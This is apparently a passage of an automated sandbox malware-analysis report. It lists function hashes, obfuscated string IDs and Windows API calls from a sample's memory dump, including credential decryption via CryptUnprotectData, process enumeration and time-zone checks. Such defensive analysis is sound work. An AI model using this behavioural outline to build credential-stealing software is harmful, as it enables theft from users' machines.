                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: ,c$,c$;_q~$A;O$VU.e$[Vm}
                            • API String ID: 0-633447320
                            • Opcode ID: 574347b01e4f32cca295581757e96a652fad670b1dfaf7dd7faa7ba9d7d53201
                            • Instruction ID: d58f1fffaecd0ee27e8977a92f6f9f6674d372c0ae421f12a6667af6c89347db
                            • Opcode Fuzzy Hash: 574347b01e4f32cca295581757e96a652fad670b1dfaf7dd7faa7ba9d7d53201
                            • Instruction Fuzzy Hash: B4B238F360C6049FE304AE6DEC8567AFBE9EF94320F16463DEAC5C3744EA3558018696
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00B22C42
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00B22C49
                            • GetTimeZoneInformation.KERNEL32(?), ref: 00B22C58
                            • wsprintfA.USER32 ref: 00B22C83
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                            • String ID: wwww
                            • API String ID: 3317088062-671953474
                            • Opcode ID: df7521f55878024a0b793e85bda088499a9c2d36b7d634f3a9cc039633b093ba
                            • Instruction ID: 127af86c0a6d13aa46f37d57a93c0ec0dcb746677fd2194552fed7a3be7f12b2
                            • Opcode Fuzzy Hash: df7521f55878024a0b793e85bda088499a9c2d36b7d634f3a9cc039633b093ba
                            • Instruction Fuzzy Hash: 2E01F271A04714ABCB1C8B58DC4AB6ABB69EB84721F004369F916DB3D0D7B419008AE1
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: +y_?$jK0X$uHLA$Lc~$Lc~
                            • API String ID: 0-182589133
                            • Opcode ID: 018593f75ebf2c27273d197ca48dbbda0462d8047eaeec98bfd51be87c62f551
                            • Instruction ID: d12f73826aad1bcf8700906d9067f68474416b10f77d8b012d4c974cf22af202
                            • Opcode Fuzzy Hash: 018593f75ebf2c27273d197ca48dbbda0462d8047eaeec98bfd51be87c62f551
                            • Instruction Fuzzy Hash: 27B238F36086049FE3046E2DEC8567ABBE9EF94720F1A853DE6C4C7744E63598058793
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: /$w}$pr$x0?L$x0?L$}}
                            • API String ID: 0-475043414
                            • Opcode ID: 9827fc7ac12a818a36498bd6167143a8f0b8c71e1fab0451c50406dc77c70a5a
                            • Instruction ID: d4ca7cf34a542221cfa2616edf3454fc978af33446566b28f50f72d86fbe2e18
                            • Opcode Fuzzy Hash: 9827fc7ac12a818a36498bd6167143a8f0b8c71e1fab0451c50406dc77c70a5a
                            • Instruction Fuzzy Hash: 43B207F3A082009FE304AE2DEC8567AB7E5EF94720F1A4A3DEAC5C3744E67558058797
                            APIs
                            • GetSystemTime.KERNEL32(?), ref: 00B21B72
                              • Part of subcall function 00B21820: lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B2184F
                              • Part of subcall function 00B21820: lstrlen.KERNEL32(01867080), ref: 00B21860
                              • Part of subcall function 00B21820: lstrcpy.KERNEL32(00000000,00000000), ref: 00B21887
                              • Part of subcall function 00B21820: lstrcat.KERNEL32(00000000,00000000), ref: 00B21892
                              • Part of subcall function 00B21820: lstrcpy.KERNEL32(00000000,00000000), ref: 00B218C1
                              • Part of subcall function 00B21820: lstrlen.KERNEL32(00B34FA0), ref: 00B218D3
                              • Part of subcall function 00B21820: lstrcpy.KERNEL32(00000000,00000000), ref: 00B218F4
                              • Part of subcall function 00B21820: lstrcat.KERNEL32(00000000,00B34FA0), ref: 00B21900
                              • Part of subcall function 00B21820: lstrcpy.KERNEL32(00000000,00000000), ref: 00B2192F
                            • sscanf.NTDLL ref: 00B21B9A
                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00B21BB6
                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00B21BC6
                            • ExitProcess.KERNEL32 ref: 00B21BE3
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                            • String ID:
                            • API String ID: 3040284667-0
                            • Opcode ID: dfff87dc134c3881f440d33bf99059f772dd3169f1ef2b6f25434985e4b80c1f
                            • Instruction ID: a30b5c9d62ae9f4560cf5581cec14e71fdfd42b08eef2c1a84193f280c16927f
                            • Opcode Fuzzy Hash: dfff87dc134c3881f440d33bf99059f772dd3169f1ef2b6f25434985e4b80c1f
                            • Instruction Fuzzy Hash: 4521E2B1518301AF8354DF69D88585BFBF8EED8214F409E1EF599C3220E770D5098BA2
                            APIs
                            • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00B0775E
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00B07765
                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00B0778D
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 00B077AD
                            • LocalFree.KERNEL32(?), ref: 00B077B7
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                            • String ID:
                            • API String ID: 2609814428-0
                            • Opcode ID: b58976332dc8aeb4a7039fcbbcaa035c6c76f4eb6d304ecf58f9472833bda389
                            • Instruction ID: 8fa8dc67405f470ca6b0dc404827df7db65e3f4bab705ce011f5f7134db7e39c
                            • Opcode Fuzzy Hash: b58976332dc8aeb4a7039fcbbcaa035c6c76f4eb6d304ecf58f9472833bda389
                            • Instruction Fuzzy Hash: F6011275B443187BEB14DB94DC5AFAABB78EB44B11F104155FB09EB3C0D6F0A9008BA0
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: ?Qo$A(sw$G+g^$oI}c$./
                            • API String ID: 0-3995498834
                            • Opcode ID: 2da51f2747bbca8fdaa411fa4092ea7a0ad2b025f8f82ecb900b08970a110f40
                            • Instruction ID: 94055d043ccd95d24154943d182758bd686ad608f746da2d21717dc68922133e
                            • Opcode Fuzzy Hash: 2da51f2747bbca8fdaa411fa4092ea7a0ad2b025f8f82ecb900b08970a110f40
                            • Instruction Fuzzy Hash: 1A720AF360C2009FE304AE6DEC8567AB7E9EFD4720F16893DE6C4D7744EA3598018696
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: ;El$tY{$y3n${;n|
                            • API String ID: 0-4214471348
                            • Opcode ID: 53e2004475636aa6f3477f81b7f0f07ad5288f105563c99c2a239e0f776d3c21
                            • Instruction ID: 883a40a19e0cee30de478b6be87b74691784c835160b2ac232c746ee8061713a
                            • Opcode Fuzzy Hash: 53e2004475636aa6f3477f81b7f0f07ad5288f105563c99c2a239e0f776d3c21
                            • Instruction Fuzzy Hash: F6B225F360C2049FE3046E2DEC8567AFBE9EF94720F16863DEAC487744EA3558058697
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: ."_m$B:cs$ww=${m}~
                            • API String ID: 0-3494201005
                            • Opcode ID: 0bf7849ec53ee004f807917d1afffcbd4077b11b0c5773a21fd8570e1a276069
                            • Instruction ID: 58d241e12398330d9e1e5f5a3c870d1af06a30d0a26863bea5420291676297e2
                            • Opcode Fuzzy Hash: 0bf7849ec53ee004f807917d1afffcbd4077b11b0c5773a21fd8570e1a276069
                            • Instruction Fuzzy Hash: 7FA2C6F3A08200AFE3046F2DEC85A7ABBE9EF94720F16493DE6C4C7344E67558458796
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                             • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 4bdW$q~;=$w`L$;;~
                            • API String ID: 0-973534734
                            • Opcode ID: 761bc94bdfedb468eae1002298a03f0649e842b6969f6977c144a32344b9a1a8
                            • Instruction ID: a96da98b369fd61d592210d85ace8b82d43b18e341f13c7cbdc909ef67244fd1
                            • Opcode Fuzzy Hash: 761bc94bdfedb468eae1002298a03f0649e842b6969f6977c144a32344b9a1a8
                            • Instruction Fuzzy Hash: 08A2E6F360C6049FE304AE2DEC8577ABBE9EF94320F1A493DE6C4C7744E63598418696
                            APIs
                              • Part of subcall function 00B271E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 00B271FE
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00B23A96
                            • Process32First.KERNEL32(00000000,00000128), ref: 00B23AA9
                            • Process32Next.KERNEL32(00000000,00000128), ref: 00B23ABF
                              • Part of subcall function 00B27310: lstrlen.KERNEL32(------,00B05BEB), ref: 00B2731B
                              • Part of subcall function 00B27310: lstrcpy.KERNEL32(00000000), ref: 00B2733F
                              • Part of subcall function 00B27310: lstrcat.KERNEL32(?,------), ref: 00B27349
                              • Part of subcall function 00B27280: lstrcpy.KERNEL32(00000000), ref: 00B272AE
                            • CloseHandle.KERNEL32(00000000), ref: 00B23BF7
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                             • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                            • String ID:
                            • API String ID: 1066202413-0
                            • Opcode ID: 68771b5c25c747cb4f6cfedefe140b4abdd53e4fa6551f5361c6023c78712999
                            • Instruction ID: aac5495004325efc6f4c0f54b0ffec7a809588c88adcf4e2c2cdc830556398b3
                            • Opcode Fuzzy Hash: 68771b5c25c747cb4f6cfedefe140b4abdd53e4fa6551f5361c6023c78712999
                            • Instruction Fuzzy Hash: 7581BD31905324CFC714CF18E988B95B7E1EB45729F29C1E9D40DAB2A2D77A9D82CF90
                            APIs
                            • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 00B0EA76
                            • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 00B0EA7E
                            • lstrcat.KERNEL32(00B2CFEC,00B2CFEC), ref: 00B0EB27
                            • lstrcat.KERNEL32(00B2CFEC,00B2CFEC), ref: 00B0EB49
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                             • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
